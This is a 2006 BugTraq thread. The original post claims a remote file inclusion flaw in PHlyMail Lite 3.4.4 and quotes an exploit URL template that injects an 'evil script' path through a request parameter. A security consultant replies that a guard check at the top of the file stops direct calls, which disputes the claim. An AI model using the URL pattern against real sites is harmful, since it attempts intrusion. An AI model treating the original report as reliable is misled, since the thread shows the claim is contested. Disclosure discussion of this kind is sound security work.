BugTraq
PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability Aug 18 2006 09:52PM
D3nGeR Gmail CoM (1 replies)
Re: PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability Aug 23 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)
Hi,

D3nGeR (at) Gmail (dot) CoM [email concealed] schrieb am Fri, 18 Aug 2006 21:52:51 +0000:

>*************************************
>*********************************************
>
>*PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability
>
>*
>
>*------------------------------------
>------------------------------------------------------------------
>
>* - [Script name: PHlyMail Lite v. 3.4.4 ]
>
>* - [Script site: http://phlymail.de ]
>
>*------------------------------------
>* Exploit:
>
>*
>
>* http://www.site.com/[phlymail_path]/handlers/email/mod.output.php?
>_PM_[path][lib]=[evil scripit]
>
>*

At the top of this script you find

| if (!defined('_IN_PHM_')) die();

So if you call it direct, which hat to be done to
manipulate _PM_[path][lib], it will die without
any code-execution after this line.

Regards
Carsten

--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz

<http://www.ceilers-it.de>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus